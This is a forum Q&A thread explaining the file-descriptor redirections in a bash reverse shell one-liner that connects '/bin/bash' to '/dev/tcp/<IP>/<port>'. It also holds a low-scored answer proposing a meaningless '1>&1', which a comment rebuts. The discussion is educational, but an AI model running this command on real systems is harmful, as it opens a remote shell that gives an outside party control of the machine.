# Testing Bash Reverse Shell

Tags: linux, bash, shell

I am testing a reverse shell using the tutorial found [here](http://null-byte.wonderhowto.com/how-to/create-reverse-shell-remotely-execute-root-commands-over-any-open-port-using-netcat-bash-0132658/).

I have some question about the meaning of the commands used. The command to run on the server is the following:

```
/bin/bash > /dev/tcp/<IP>/<port> 0<&1 2>&1
```

I want to double check its meaning. Based on my understanding:

- Start a bash shell
- Redirect output of the shell to TCP connection `<IP>:<port>`
- `0<&1`: Redirect Input from connection `&1` to stdin `0`
- `2>&1`: Redirect output from stderr `2` to connection `&1`

Is the above correct ?

Comment: When you say "stdout 2", I presume that's a typo, and you mean "stderr 2"?

Answer (score 1, accepted):

Yes, it's correct; the goal is for all three FDs -- stdin, stdout, and stderr -- to be pointing to your TCP connection.

Note that this command needs to be run in a bash compiled with `/dev/tcp`, which is an optional feature provided by the shell itself, not the operating system; moreover, this means that something like `system()`, which uses `/bin/sh`, typically won't work to invoke it.

Answer (score 0):

For STDOUT, use **1>&1**, because **2** will redirect **STDERR** stream.

So your command should be -
`/bin/bash > /dev/tcp/<IP>/<port> 0<&1 1>&1`

Comment: Eh? `1>&1` does nothing at all; fdup'ing FD 1 to FD 1 is meaningless, since it's already there.

Comment: I made a typo. I fixed it.

Comment: Yeah, but it was just for explanation, as he wrote "Redirect output from **stdout** 2 to connection" and asked - Is the above correct? :)